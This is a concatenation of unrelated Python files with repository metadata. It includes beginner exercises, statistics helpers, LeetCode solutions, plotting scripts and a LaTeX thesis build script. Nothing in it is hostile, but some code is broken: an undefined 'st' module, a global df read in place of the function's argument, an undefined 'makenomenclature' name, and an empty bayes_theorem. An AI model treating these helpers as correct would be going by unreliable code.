print "Made it to the end and closes"
f.close()
|
[
"bmichlin@rice.edu"
] |
bmichlin@rice.edu
|
71c99974459ee5974e36e755091f0d37914ff64c
|
87b55dd99e9828bed011fd7cf0a3cf059d70d391
|
/pythonPractice/ex26.py
|
9d6dc85354bd28fb93c4f707f95c16c35e6007d3
|
[] |
no_license
|
David-GaTre/Python-the-hard-way
|
f2945a84b07a3c35d0d8d8f2b9e53b514043d9c9
|
558c7986b655b9f951181b73ac2de62a1e19d7dd
|
refs/heads/master
| 2022-01-18T09:43:28.303865
| 2019-08-04T07:21:53
| 2019-08-04T07:21:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,285
|
py
|
def break_words(stuff):
"""This function will break up words for us."""
words = stuff.split(' ')
return words
def sort_words(words):
"""Sorts the words."""
return sorted(words)
def print_first_word(words):
"""Prints the first word after popping it off."""
word = words.pop(0)
print word
def print_last_word(words):
"""Prints the last word after popping it off."""
word = words.pop(-1)
print word
def sort_sentence(sentence):
"""Takes in a full sentence and returns the sorted words."""
words = break_words(sentence)
return sort_words(words)
def print_first_and_last(sentence):
"""Prints the first and last words of the sentence."""
words = break_words(sentence)
print_first_word(words)
print_last_word(words)
def print_first_and_last_sorted(sentence):
"""Sorts the words then prints the first and last one."""
words = sort_sentence(sentence)
print_first_word(words)
print_last_word(words)
print "Let's practice everything."
print 'You\'d need to know \'bout escapes with \\ that do \n newlines and \t tabs.'
poem = """
\tThe lovely world
with logic so firmly planted
cannot discern \n the needs of love
nor comprehend passion from intuition
and requires an explantion
\n\t\twhere there is none.
"""
print "--------------"
print poem
print "--------------"
five = 10 - 2 + 3 - 6
print "This should be five: %s" % five
def secret_formula(started):
jelly_beans = started * 500
jars = jelly_beans / 1000
crates = jars / 100
return jelly_beans, jars, crates
start_point = 10000
beans, jars, crates = secret_formula(start_point)
print "With a starting point of: %d" % start_point
print "We'd have %d jeans, %d jars, and %d crates." % (beans, jars, crates)
start_point = start_point / 10
print "We can also do that this way:"
print "We'd have %d beans, %d jars, and %d crabapples." % secret_formula(start_point)
sentence = "All good things come to those who weight."
words = break_words(sentence)
sorted_words = sort_words(words)
print_first_word(words)
print_last_word(words)
print_first_word(sorted_words)
print_last_word(sorted_words)
sorted_words = sort_sentence(sentence)
print sorted_words
print_first_and_last(sentence)
print_first_and_last_sorted(sentence)
|
[
"gtdavid2013@gmail.com"
] |
gtdavid2013@gmail.com
|
5d89b263f903257da771dc932d0f1474a6cc84f2
|
ca16db75d99903e135589da7c737dbe88a12bb4b
|
/Scripts/plottingCodes/DescritiveData.py
|
ea9999121b77355c9c4285d8c8a3b3b0f5df42e8
|
[] |
no_license
|
iphyer/CS760_Twitter_Demographics
|
7b413ae3753bb7487a8f89b8ba09e9876fabea56
|
3354fde862dbbab8965c0dd709a02643849e0668
|
refs/heads/master
| 2021-09-13T06:42:48.524495
| 2018-04-26T02:42:16
| 2018-04-26T02:42:16
| 111,339,780
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,365
|
py
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 5 20:44:28 2017
@author: mingrenshen
"""
# import libarary needed
import pandas as pd # data processing
import matplotlib.pyplot as plt
######################################################
# read in data
######################################################
## user data
allUsrFeatureData = pd.read_csv("../data/louis_users_all_features_label_1205_updated.csv")
# plotting Data
#grouped = allUsrFeatureData['freqWeekDay'].groupby('gender')
print allUsrFeatureData['gender'].value_counts()
# Font for figure
font_axis_publish = {
'color': 'black',
'weight': 'normal',
'size': 15,
}
#ax = allUsrFeatureData.boxplot(column='freqWeekDay',by='gender')
#plt.ylabel('RMSF ($\AA$)', fontdict=font_axis_publish)
#plt.xlim(0,1000)
#plt.set_title("")
col_list = list(allUsrFeatureData.columns.values)
starting_index = col_list.index("gender")
for i in range(len(col_list)):
if i > starting_index:
curr_feature = col_list[i]
allUsrFeatureData.boxplot(column=curr_feature,by='gender')
plt.title(curr_feature, fontdict=font_axis_publish)
plt.suptitle("")
plt.xlabel('gender', fontdict=font_axis_publish)
#plt.show()
str_tmp = curr_feature + '.png'
plt.savefig(str_tmp)
plt.close()
|
[
"iphyer@163.com"
] |
iphyer@163.com
|
e9155963542c0338f2e00c360ebb229b888acae0
|
439f1b3e2e7a454abd2cfac99d3074ba02405c09
|
/code.py
|
9c2f9842cf2aaa24cd16140cf0d7ad625a5414ae
|
[
"MIT"
] |
permissive
|
saikrishnan255/extracting-business-insights
|
10c1286fafa41d59907b7b9afabf39fdd1300c56
|
b79922148bd1aa80bea9d3571456f2891f06c713
|
refs/heads/main
| 2023-02-04T16:03:35.220099
| 2020-12-22T11:30:22
| 2020-12-22T11:30:22
| 323,607,104
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,061
|
py
|
# --------------
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
df = pd.read_csv(path)
def visual_summary(type_, df, col):
df[col].plot(kind = type_)
plt.show()
"""Summarize the Data using Visual Method.
This function accepts the type of visualization, the data frame and the column to be summarized.
It displays the chart based on the given parameters.
Keyword arguments:
type_ -- visualization method to be used
df -- the dataframe
col -- the column in the dataframe to be summarized
"""
def central_tendency(type_, df, col):
stats = {'mean': np.mean,'median': np.median, 'mode': st.mode}
return stats[type_](df[col])
"""Calculate the measure of central tendency.
This function accepts the type of central tendency to be calculated, the data frame and the required column.
It returns the calculated measure.
Keyword arguments:
type_ -- type of central tendency to be calculated
df -- the dataframe
col -- the column in the dataframe to do the calculations
Returns:
cent_tend -- the calculated measure of central tendency
"""
def ranger(df):
return max(df) - min(df)
def mad(df):
return(np.mean(np.absolute(df - np.mean(df))))
def cv(df):
return(((np.std(df)/np.mean(df)))*100)
def iqr(df):
return (np.percentile(df,75)- np.percentile(df,25))
def measure_of_dispersion(type_, df, col):
stats = {'Standard Deviation':np.std,'Variance':np.var,'Range':ranger,'Covariance':np.cov,'MAD':mad,'CV':cv,'IQR':iqr}
return stats[type_](df[col])
"""Calculate the measure of dispersion.
This function accepts the measure of dispersion to be calculated, the data frame and the required column(s).
It returns the calculated measure.
Keyword arguments:
type_ -- type of central tendency to be calculated
df -- the dataframe
col -- the column(s) in the dataframe to do the calculations, this is a list with 2 elements if we want to calculate covariance
Returns:
disp -- the calculated measure of dispersion
"""
def calculate_correlation(type_, df, col1, col2):
if type_ == 'Pearson':
return (df.cov().loc[col1,col2])/(np.std(df[col1])*np.std(df[col2]))
elif type_ == 'Spearman':
d = df[[col1,col2]].rank(axis = 0)
d['d^2'] = (d[col1] - d[col2])**2
d_square = d['d^2'].sum()
l = len(df[col1])
spearman = 1-((6*d_square)/(l*(l**2-1)))
return spearman
"""Calculate the defined correlation coefficient.
This function accepts the type of correlation coefficient to be calculated, the data frame and the two column.
It returns the calculated coefficient.
Keyword arguments:
type_ -- type of correlation coefficient to be calculated
df -- the dataframe
col1 -- first column
col2 -- second column
Returns:
corr -- the calculated correlation coefficient
"""
def calculate_probability_discrete(data, event):
crisis = df[event].value_counts()
return(crisis.iloc[1]/(crisis.iloc[0] + crisis.iloc[1]))
"""Calculates the probability of an event from a discrete distribution.
This function accepts the distribution of a variable and the event, and returns the probability of the event.
Keyword arguments:
data -- series that contains the distribution of the discrete variable
event -- the event for which the probability is to be calculated
Returns:
prob -- calculated probability fo the event
"""
def event_independence_check(prob_event1, prob_event2, prob_event1_event2):
pa_b = prob_event1_event2/prob_event2
if pa_b == prob_event1:
return 'Independent'
elif pa_b != prob_event1:
return 'Dependent'
"""Checks if two events are independent.
This function accepts the probability of 2 events and their joint probability.
And prints if the events are independent or not.
Keyword arguments:
prob_event1 -- probability of event1
prob_event2 -- probability of event2
prob_event1_event2 -- probability of event1 and event2
"""
# Checking if banking crisis is independent
b_s = df[(df['systemic_crisis'] == 1) & (df['banking_crisis'] == 'crisis')]
b_i = df[(df['inflation_crises'] == 1) & (df['banking_crisis'] == 'crisis')]
b_c = df[(df['currency_crises'] == 1) & (df['banking_crisis'] == 'crisis')]
p_bank_system = b_s['case'].count()/df['case'].count()
p_bank_currency = b_c['case'].count()/df['case'].count()
p_bank_inflation = b_i['case'].count()/df['case'].count()
p_bank = calculate_probability_discrete(df,'banking_crisis')
p_system = calculate_probability_discrete(df,'systemic_crisis')
p_inflation = calculate_probability_discrete(df,'inflation_crises')
p_currency = calculate_probability_discrete(df,'currency_crises')
# System
event_independence_check(p_bank, p_system, p_bank_system)
# Currency
event_independence_check(p_bank, p_currency, p_bank_currency)
# Inflation
event_independence_check(p_bank, p_inflation, p_bank_inflation)
# Bank given system
p_b_s = p_bank_system/p_system
p_b_c = p_bank_currency/p_currency
p_b_i = p_bank_inflation/p_inflation
prob_ = [p_b_s,p_b_c,p_b_i]
def bayes_theorem(df, col1, event1, col2, event2):
"""Calculates the conditional probability using Bayes Theorem.
This function accepts the dataframe, two columns along with two conditions to calculate the probability, P(B|A).
You can call the calculate_probability_discrete() to find the basic probabilities and then use them to find the conditional probability.
Keyword arguments:
df -- the dataframe
col1 -- the first column where the first event is recorded
event1 -- event to define the first condition
col2 -- the second column where the second event is recorded
event2 -- event to define the second condition
Returns:
prob -- calculated probability for the event1 given event2 has already occured
"""
|
[
"70769945+saikrishnan255@users.noreply.github.com"
] |
70769945+saikrishnan255@users.noreply.github.com
|
0ad9fe4925f4b28b1e4d34b71d268ddf45ccb8a2
|
301e55ee3990b2daf135197eac81e1cc244e6cd3
|
/python/search-in-rotated-sorted-array.py
|
ac8d648b579b72e53fc06f4ec7a23090d95a213e
|
[
"MIT"
] |
permissive
|
alirezaghey/leetcode-solutions
|
74b1b645c324ea7c1511d9ce3a97c8d622554417
|
c32b786e52dd25ff6e4f84242cec5ff1c5a869df
|
refs/heads/master
| 2022-08-22T16:28:05.459163
| 2022-08-18T12:02:51
| 2022-08-18T12:02:51
| 203,028,081
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 996
|
py
|
from typing import List
class Solution:
# Time complexity: O(log n) where n is the length of nums
# Space complexity: O(1)
def search(self, nums: List[int], target: int) -> int:
left, right = 0, len(nums)-1
while left <= right:
mid = left + (right - left) // 2
if nums[mid] < target:
if nums[mid] < nums[-1]: # right part
if target > nums[-1]:
right = mid-1
else:
left = mid+1
else: # left part
left = mid+1
elif nums[mid] > target:
if nums[mid] < nums[-1]: # right part
right = mid-1
else: # left part
if target < nums[0]:
left = mid+1
else:
right = mid-1
else:
return mid
return -1
|
[
"alireza.q1357@gmail.com"
] |
alireza.q1357@gmail.com
|
d9c783ad8abf89d55348ad7b4a292cdac5bbf359
|
91a0bfacb61ae681860c560ba52ac09df4910b8f
|
/Codes/visualize.py
|
6289ddbd090a1437bbe538404c0c01dd6a2e14a9
|
[
"LicenseRef-scancode-unknown-license-reference",
"MIT"
] |
permissive
|
AayushKadam/brain_age
|
98609293827778b978215b9d681f521fdab6d948
|
8a768e29046d525fdef3d57a58c742b52ed6f8e7
|
refs/heads/master
| 2021-10-15T19:18:22.779808
| 2019-02-05T20:12:46
| 2019-02-05T20:12:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,366
|
py
|
import os
import matplotlib.pyplot as plt
import numpy as np
import random
#import scipy.ndimage
def show_slices(slices):
""" Function to display row of image slices """
fig, axes = plt.subplots(1, len(slices))
for i, slice in enumerate(slices):
axes[i].imshow(slice.T, cmap="gray", origin="lower")
def rot90(m, k=1, axis=2):
"""Rotate an array by 90 degrees in the counter-clockwise direction around the given axis"""
m = np.swapaxes(m, 2, axis)
m = np.rot90(m, k)
m = np.swapaxes(m, 2, axis)
return m
#first = np.load('data2\\1#(65, 65, 55).npy')
"""
X_before = 5
npad = ((5, 5), (0, 0), (0, 0))
first = np.pad(first, pad_width=npad, mode='constant', constant_values=0)
startz = 65//2-(55//2)
first = first[0:65,0:65, startz:startz+55]
"""
first = np.load('data2\\85#(65, 65, 55).npy')
#first = np.load('mean_img2.npy')
second = np.load('shuffled2\\45#(65, 65, 55).npy')
#first = rot90(first, 3, 0)
#first = rot90(first, 1, 2)
print(first.shape)
show_slices([
first[int(first.shape[0]/2), :, :],
first[:, int(first.shape[1]/2), :],
first[:, :, int(first.shape[2]/2)]])
plt.show()
show_slices([second[int(second.shape[0]/2), :, :],
second[:, int(second.shape[1]/2), :],
second[:, :, int(second.shape[2]/2)]])
plt.show()
|
[
"zach_lyu@berkeley.edu"
] |
zach_lyu@berkeley.edu
|
5277a28915df23b9142e32432af44be09e017f3a
|
3add20877ed753be70402e97f40ad3737a265515
|
/lecture_advanced/Lecture1.HotFollowupQuestions/386. Longest Substring with At Most K Distinct Characters.py
|
93cfa12ae7c8ad41d8048f0341ca09073b900826
|
[] |
no_license
|
zhuohuwu0603/interview-algothims
|
85f48b7de2e87129fd353528b114cb80c8877d7b
|
338d3bc2f2916c5c4936767b07b2fd22b4121049
|
refs/heads/master
| 2022-01-08T11:27:16.441367
| 2019-06-12T05:49:25
| 2019-06-12T05:49:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,347
|
py
|
'''
Given a string s, find the length of the longest substring T that contains at most k distinct characters.
Example
For example, Given s = "eceba", k = 3,
T is "eceb" which its length is 4.
Challenge
O(n), n is the size of the string s.
'''
import collections
class Solution:
"""
@param s: A string
@param k: An integer
@return: An integer
"""
def lengthOfLongestSubstringKDistinct(self, s, k):
# write your code here
if not s or k <= 0:
return 0
start, end, ans = 0, 0, 0
myhash = collections.defaultdict(int)
for start in range(len(s)):
while end < len(s):
myhash[s[end]] += 1
if len(myhash) <= k:
end += 1
else:
break
ans = max(ans, end - start)
myhash[s[start]] -= 1
if myhash[s[start]] == 0:
del myhash[s[start]]
return ans
'''
算法武器:前向型移窗口类动双指针
本题的题型是滑动窗口类型,使用模板写法:
定义start,end,ans三个变量
start做外层for循环
end做内层while循环
while条件为end的边界和题目的约束
更新答案部分必须要加条件判断
更新答案必须在更新end变量之前
对于hash表的处理都是放在while循环内进行,一般不需要在for层做任何特别处理
注意:
本题求解的是上界答案问题
我们的答案直接在内层while循环中更新,而不需要当while退出之后再根据条件更新答案,因为while循环的条件是end在边界内,同时满足题目条件,这意味着我们找到一组有效解,我们需要和全局解比较,不断更新上界的解
在更新答案的时候还是要确定一下条件,再更新
if len(hashmap) <= k:
ans = max(ans, end - start + 1)
其他类求下界问题,比如sum类求下界问题,我们就需要在跳出while循环单独更新。因为while循环进行的条件是end在边界内,同时不满足条件的时候,我们继续扩大窗口边界,移动end指针。当循环跳出时,我们可能找到了一组有效解,所以我们还需要检查条件是否满足,满足时才将其和全局答案比较、更新
'''
|
[
"michaelz@squareup.com"
] |
michaelz@squareup.com
|
9094d0aa7881214514389028e5649424dde7e59d
|
d180d7bea0db0aa65ee6d6112c14da903b1867b5
|
/run.py
|
58fee9cdd7064a02060da43ffe06f863a65d5852
|
[
"CC-BY-4.0"
] |
permissive
|
willemsk/phdthesis-text
|
694eb21b0465b67f26291d0349c3fee821562311
|
43d0f0f68bb84e6305f6b430816f8585ce4e8112
|
refs/heads/main
| 2023-06-22T22:17:33.632485
| 2023-06-07T12:54:06
| 2023-06-07T12:54:06
| 345,727,833
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,723
|
py
|
#!/usr/bin/env python3
# encoding: utf-8
#
# Copyright (C), 2012-2014 by Wannes Meert, KU Leuven
#
# Very naive compilation script for the ADSPHD class.
#
# No file dependency checks are performed (use TeXnicCenter, Texmaker, latexmk,
# rubber, SCons, or make if you want such a feature).
#
import glob
import os
import re
import shlex
import sys
import argparse
from collections import namedtuple
from subprocess import *
## SETTINGS ##
given_settings = {
'mainfile': 'thesis.tex',
'chaptersdir': 'chapters',
'makebibliography': True,
'makeindex': True,
'makeglossary': True,
'makenomenclature': True,
'usebiblatex': True,
'biblatexbackend': 'biber', # alternative: bibtex
'cleanext': ['.tdo','.fls','.toc','.aux','.log','.bbl','.blg','.log',
'.lof','.lot','.ilg','.out','.glo','.gls','.nlo','.nls',
'.brf','.ist','.glg','.synctexgz','.tgz','.idx','.ind',
'-blx.bib','.fdb_latexmk','.synctex.gz','.run.xml',
'.bcf','.glsdefs','.xdy']
}
derived_settings = ['basename', 'chapters', 'cleanfiles', 'pdffile']
verbose = 0
dry = False
### INITIALISATION ###
def initapplications():
"""Initialize the application commands and arguments for the different
platforms."""
global apps
# Unix and linux are the default setup
## *NIX ##
apps.pdflatex = App('pdflatex', '-interaction=nonstopmode -synctex=1 -shell-escape {basename}', verbose)
apps.bibtex = App('bibtex', '--min-crossref=100 {basename}', verbose)
apps.biber = App('biber', '{basename}', verbose)
apps.glossary = App('makeindex', '{basename}.glo -s {basename}.ist -o {basename}.gls', verbose)
apps.nomenclature = App('makeindex', '{basename}.nlo -s nomencl.ist -o {basename}.nls', verbose)
apps.pdfviewer = App('acroread', '{pdffile}', verbose)
apps.remove = App('rm', '-f {cleanfiles}', verbose)
if sys.platform == 'darwin':
## Mac OS X ##
apps.pdfviewer = App('open', '{pdffile}', verbose)
elif sys.platform == 'win32' or sys.platform == 'cygwin':
## Windows ##
## TODO: does not yet work
pass
## DERIVED SETTINGS ##
def create(*args, **kwargs):
class DictAsObj():
def __init__(self, *args, **kwargs):
self.__dict__ = kwargs
for arg in args:
self.__dict__[arg] = None
def __iter__(self):
return self.__dict__.items().__iter__()
def items(self):
return dict(self.__dict__.items())
def copy(self):
return DictAsObj(**self.__dict__)
return DictAsObj(*args, **kwargs)
settings = create(*derived_settings, **given_settings)
settings.basename = os.path.splitext(settings.mainfile)[0]
settings.chapters = [name.replace(".tex", "") for name in glob.glob('chapters/**/*.tex')]
settings.cleanfiles = " ".join([base+ext for ext in settings.cleanext for base in [settings.basename]+settings.chapters])
settings.pdffile = settings.basename+'.pdf'
apps = create('pdflatex', 'bibtex', 'biber', 'glossary', 'nomenclature', 'pdfviewer', 'remove')
## COMPILE ##
knowntargets = dict()
def target(targetname = None):
def decorate(f):
global knowntargets
name = targetname if targetname else f.__name__
knowntargets[name] = f
return f
return decorate
## TARGETS ##
@target()
def test():
"""Verify the settings in run.py"""
allok = testSettings()
if allok:
print("Your settings appear to be consistent")
if verbose > 0:
for k,v in settings:
if verbose > 1 or k not in ['cleanfiles']:
print("{}: {}".format(k, v))
else:
print("(use -v to inspect).")
@target()
def pdf():
"""Alias for compile"""
return compile()
@target()
def compile():
"""Build thesis.pdf"""
testSettings()
latex()
def latex():
global apps
rerun = False
print('#### LATEX ####')
apps.pdflatex.run(settings, 'Latex failed')
if settings.makebibliography:
rerun = True
if settings.usebiblatex and settings.biblatexbackend == 'biber':
print('#### BIBER ####')
apps.biber.run(settings, 'Biber failed')
else:
print('#### BIBTEX ####')
apps.bibtex.run(settings, 'Bibtex failed')
if settings.makeindex:
rerun = True
print('#### INDEX ####')
if settings.makeglossary:
# List of abbreviations
rerun = True
print('#### GLOSSARY ####')
apps.glossary.run(settings, 'Creating glossary failed')
if settings.makenomenclature:
# List of symbols
rerun = True
print('#### NOMENCLATURE ####')
apps.nomenclature.run(settings, 'Creating glossary failed')
if rerun:
print('#### LATEX ####')
apps.pdflatex.run(settings, 'Rerunning (1) Latex failed')
print('#### LATEX ####')
apps.pdflatex.run(settings, 'Rerunning (2) Latex failed')
@target()
def clean():
"""Remove the auxiliary files created by Latex."""
global apps
apps.remove.run(settings, 'Removing auxiliary files failed')
@target()
def realclean():
"""Remove all files created by Latex."""
global apps
clean()
newsettings = settings.copy()
newsettings.cleanfiles += 'thesis.pdf thesis.dvi thesis.ps'
apps.remove.run(newsettings, 'Removing pdf files failed.')
@target()
def cover():
"""Generate a cover.tex file and produce a standalone cover.pdf"""
usersettings = dict()
doc_re = re.compile(r"^\\documentclass")
settings_re = [
('faculty', re.compile("faculty=([a-z]+)")),
('department', re.compile("department=([a-z]+)")),
('phddegree', re.compile("phddegree=([a-z]+)"))
]
content = []
doadd = False
with open(settings.mainfile,'r') as mf:
for line in mf:
if "documentclass" in line:
if doc_re.match(line) is not None:
for s, r in settings_re:
result = r.search(line)
if result is not None:
usersettings[s] = result.group(1)
if doadd:
content.append(line)
if "%%% COVER: Settings" in line:
doadd = True
elif "%%% COVER: End" in line:
doadd = False
if verbose > 0:
print('Recovered settings: ')
print(usersettings)
extra_usersettings = ','.join(['']+['{}={}'.format(k,v) for k,v in usersettings.items()])
with open('cover.tex','w') as cf:
cf.write("""% Cover.tex
\\documentclass[cam,cover{}]{{adsphd}}""".format(extra_usersettings))
cf.write("""
\\usepackage{printlen}
\\uselengthunit{mm}
""")
cf.write("".join(content))
cf.write("""
% Compute total page width
\\newlength{\\fullpagewidth}
\\setlength{\\fullpagewidth}{2\\adsphdpaperwidth}
\\addtolength{\\fullpagewidth}{2\\defaultlbleed}
\\addtolength{\\fullpagewidth}{2\\defaultrbleed}
\\addtolength{\\fullpagewidth}{\\adsphdspinewidth}
\\geometry{
paperwidth=\\fullpagewidth,
paperheight=\\adsphdpaperheight,
}
\\pagestyle{empty}
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
\\begin{document}
\\makefullcoverpage{\\adsphdspinewidth}{}
\\newlength{\\testje}
\\setlength{\\testje}{10mm}
\\mbox{}
\\newpage
\\subsection*{Used settings:}
\\begin{itemize}
\\item Spine width: \\printlength{\\adsphdspinewidth}
\\item Left bleed: \\printlength{\\lbleed}
\\item Right bleed: \\printlength{\\rbleed}
\\item Paper width: \\printlength{\\adsphdpaperwidth}
\\item Paper height: \\printlength{\\adsphdpaperheight}
\\item Text width: \\printlength{\\textwidth}
\\item Text height: \\printlength{\\textheight}
\\end{itemize}
\\end{document}
""")
print("Written cover to cover.tex")
newsettings = settings.copy()
newsettings.basename = 'cover'
apps.pdflatex.run(newsettings, 'Running Latex failed')
@target()
def newchapter():
"""Create the necessary files for a new chapter."""
chaptername = ""
validchaptername = re.compile(r'^[a-zA-Z0-9_.]+$')
while validchaptername.match(chaptername) == None:
chaptername = input("New chapter file name (only a-z, A-Z, 0-9 or _): ")
newdirpath = os.path.join(settings.chaptersdir, chaptername)
print("Creating new directory: "+newdirpath)
if not os.path.exists(newdirpath):
os.makedirs(newdirpath)
newfilepath = os.path.join(newdirpath,chaptername+".tex")
print("Creating new tex-file: "+newfilepath)
newfile = open(newfilepath, 'w')
print("% !TeX root = ../../"+settings.mainfile, file=newfile)
print("\\chapter{This is "+chaptername+"}\\label{ch:"+chaptername+"}\n", file=newfile)
print("\n\\ldots\n\n\n\n\
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n\
% Keep the following \\cleardoublepage at the end of this file, \n\
% otherwise \\includeonly includes empty pages.\n\
\\cleardoublepage\n", file=newfile)
newfile.close()
@target()
def view():
"""Open the generated pdf file in a pdf viewer."""
print("Opening "+settings.pdffile)
apps.pdfviewer.run(settings, 'Opening pdf failed.')
@target()
def targets():
"""Print overview of available targets."""
print("Targets:")
targetdocs = [(target,f.__doc__) for (target,f) in knowntargets.items()]
maxl = max((len(t) for (t,d) in targetdocs))
targetdocs.sort()
for (target,doc) in targetdocs:
s = "- {:<"+str(maxl)+"} {}"
if doc == None:
doc = ''
print(s.format(target,doc))
## AUXILIARY ##
def testSettings():
"""Verify whether run.py is using the expected settings based on
thesis.tex.
"""
allok = True
allok = allok and testBiblatex()
allok = allok and testNomenclature()
allok = allok and testGlossary()
return allok
def testBiblatex():
"""Test whether the main tex file includes biblatex and if this is
consistent with the settings in run.py
"""
global usebiblatex
allok = True
isusingbiblatex = False
# pattern = re.compile(r'^\\documentclass.*biblatex*.*$')
pattern = re.compile(r'^\s*[^%].*{biblatex}')
with open(settings.mainfile, 'r') as f:
for line in f:
if pattern.search(line) != None:
isusingbiblatex = True
if not settings.usebiblatex:
print("WARNING: It appears you are using biblatex while this setting in run.py is set to false.\n")
allok = False
# settings.usebiblatex = True
return allok
if not isusingbiblatex and settings.usebiblatex:
print("WARNING: It appears you are not using biblatex while this setting in run.py is set to true.\n")
# settings.usebiblatex = False
allok = False
return allok
def testNomenclature():
"""Check whether the nomenclature settings are consistent."""
allok = True
texfile = open(settings.mainfile, 'r')
pattern = re.compile(r'^\s*\\usepackage.*{nomencl}.*')
found = False
for line in texfile:
if pattern.search(line) != None:
found = True
if not found and makenomenclature:
print("\nWARNING: Trying to build the nomenclature but you have not include the nomencl Latex package.\n")
allok = False
if found and not settings.makenomenclature:
print("\nWARNING: You have included the nomencl Latex package but in the run.py script this step is not activated.\n")
allok = False
return allok
def testGlossary():
"""Check whether the glossaries settings are consistent."""
allok = True
texfile = open(settings.mainfile, 'r')
pattern = re.compile(r'^\s*\\usepackage.*{glossaries.*')
found = False
for line in texfile:
if pattern.search(line) != None:
found = True
if not found and settings.makeglossary:
print("\nWARNING: Trying to build the glossary but you have not include the glossaries Latex package.\n")
allok = False
if found and not settings.makeglossary:
print("\nWARNING: You have included the glossary Latex package but in the run.py script this step is not activated.\n")
allok = False
return allok
## APPLICATION ##
class App:
def __init__(self, b, o, v=0):
self.binary = b
self.options = o
self.verbose = v
def run(self, settings, errmsg):
""" Run the command for the given settings.
Required settings:
- basename
- cleanfiles
:returns: Return code
"""
returncode = 1
try:
cmd = self.options.format(**settings.items())
args = shlex.split(cmd)
print("Running: "+self.binary+" "+" ".join(args))
if not dry:
returncode = check_call([self.binary] + args)
except CalledProcessError as err:
print(err)
print(sys.argv[0].split("/")[-1] + ": "+errmsg+" (exitcode "+str(err.returncode)+")", file=sys.stderr)
sys.exit(1)
return returncode
## COMMAND LINE INTERFACE ##
class Usage(Exception):
def __init__(self, msg):
self.msg = msg
def main(argv=None):
global verbose
global dry
parser = argparse.ArgumentParser(
description='''
Naive compilation script for the ADSPhD class. No file dependency checks
are performed. Use TeXnicCenter, Texmaker, latexmk, rubber, SCons or
make for such a feature.''',
epilog='''
Settings: Open run.py with a text editor and change values in the settings
definition
''')
parser.add_argument('--verbose', '-v', action='count', help='Verbose output')
parser.add_argument('--targets', '-T', action='store_true', help='Print available targets')
parser.add_argument('--dry', '-d', action='store_true', help='Dry run to see commands without executing them')
parser.add_argument('target', nargs='*', help='Targets')
args = parser.parse_args(argv)
if args.verbose is not None:
verbose = args.verbose
dry = args.dry
if args.targets:
targets()
return
initapplications()
if len(args.target) == 0:
print("No targets given, using default target: compile")
compile()
for target in args.target:
print("Target: "+target)
if target in knowntargets:
knowntargets[target]()
else:
print("Unknown target")
if __name__ == "__main__":
sys.exit(main())
|
[
"kherim.willems@imec.be"
] |
kherim.willems@imec.be
|
72fb24a240291a432d20c7b10d1f829948019281
|
ccf324383bce0a74ef3a4eca9f277e9db89800bb
|
/Chp8/8-3_exercises.py
|
0bba55f4dd698b068f18ad00a90cd7d1a4abef43
|
[] |
no_license
|
tanktoptony/RealPython-Book1
|
825ef822cee8593bb80a95a840bda0a8214ea311
|
0c3cd79edf9e61236b0164e52d212d0bbd208c5a
|
refs/heads/master
| 2021-01-12T00:39:53.717091
| 2015-04-16T08:51:45
| 2015-04-16T08:51:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 522
|
py
|
# 1. Write a script that prompts the user to enter a word using the raw_input() function,
# stores that input in a string object, and then displays whether the length of that string
# is less than 5 characters, greater than 5 characters, or equal to 5 characters by using a
# set of if, elif and else statements.
#1
user_input = raw_input("Enter a word: ")
if len(user_input) < 5:
print 'less that 5 characters'
elif len(user_input) > 5:
print 'greater that 5 characters'
else:
print 'equal to 5 characters'
|
[
"michael@mlnorman.com"
] |
michael@mlnorman.com
|
0dfb49a2afd192c3a3d067f55be0b096846c7d5a
|
8b8af2d3a8c04ab75d0b331771fa16e0bfe96301
|
/storage/csv_dictwrite.py
|
87f5899f076e23b15d8bfb31811c34902727a421
|
[] |
no_license
|
RyukerLiu/introducing-python
|
6a44b6560e0f82b1886d3359cd0b4bc21e486430
|
f902a1fa7b31cd6c1978d176fec3b1bf6bb23718
|
refs/heads/master
| 2020-05-03T01:25:10.869550
| 2019-04-02T07:20:20
| 2019-04-02T07:20:20
| 178,336,744
| 0
| 0
| null | 2019-03-29T05:13:19
| 2019-03-29T05:13:19
| null |
UTF-8
|
Python
| false
| false
| 254
|
py
|
import csv
villains = [{'first': 'Doctor', 'last': 'No'} , {'first': 'Rosa', 'last' : 'Klebb'}]
with open('villians', 'wt', newline='') as fout:
csvout = csv.DictWriter(fout, ['first', 'last'])
csvout.writeheader()
csvout.writerows(villains)
|
[
"alex03108861@yahoo.com.tw"
] |
alex03108861@yahoo.com.tw
|
f15ea5350f91db08607111b1b3da17afdb7e9df0
|
e10a6d844a286db26ef56469e31dc8488a8c6f0e
|
/compositional_rl/gwob/examples/web_environment_example.py
|
db65accda519a7ce01ec591613e7c7d0385b57be
|
[
"Apache-2.0",
"CC-BY-4.0"
] |
permissive
|
Jimmy-INL/google-research
|
54ad5551f97977f01297abddbfc8a99a7900b791
|
5573d9c5822f4e866b6692769963ae819cb3f10d
|
refs/heads/master
| 2023-04-07T19:43:54.483068
| 2023-03-24T16:27:28
| 2023-03-24T16:32:17
| 282,682,170
| 1
| 0
|
Apache-2.0
| 2020-07-26T15:50:32
| 2020-07-26T15:50:31
| null |
UTF-8
|
Python
| false
| false
| 6,400
|
py
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
